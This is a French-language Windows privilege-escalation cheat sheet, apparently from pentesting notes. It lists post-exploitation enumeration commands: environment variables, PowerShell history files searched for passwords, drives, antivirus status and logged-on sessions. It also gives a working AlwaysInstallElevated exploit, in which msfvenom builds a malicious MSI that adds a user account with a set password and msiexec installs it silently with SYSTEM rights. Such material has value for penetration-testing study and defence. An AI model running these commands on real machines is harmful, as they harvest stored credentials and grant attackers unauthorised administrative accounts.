Vous pouvez énumérer tout ce qui se trouve ici avec le logiciel WinPEAS, mais voici une idée de ce que l’on peut trouver d’intéressant avec ce logiciel.
Variables d’environnement
set
dir env:
Get-ChildItem Env: | ft Key,Value
Historiques de commandes powershell
ConsoleHost_history #Find the PATH where is saved
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\germa\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
Code powershell pour avoir une listee des lecteurs sous Windows
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
>> wmic logicaldisk get caption,description,providername
>> wmic logicaldisk get caption | fsutil fsinfo drives
AlwaysInstallElevated. Si ces clés ont une valeur de 0x1, alors n’importe quel utilisateur peut installer des fichiers MSI avec les droits NT AUTHORITY\SYSTEM
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
msfvenom -p windows/adduser USER=germain PASS=King123! -f msi-nouac -o exploit.msi #Pas de UAC
msfvenom -p windows/adduser USER=germain PASS=King123! -f msi -o exploit.msi #en utilisant msiexec, il n'y a pas de prompt UAC
msiexec /quiet /qn /i C:\Users\germain\Downloads\exploit.msi
Vérifie si un antivirus tourne
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | more
Get-MpComputerStatus
Utilisateurs connectés et sessions
qwinsta
klist sessions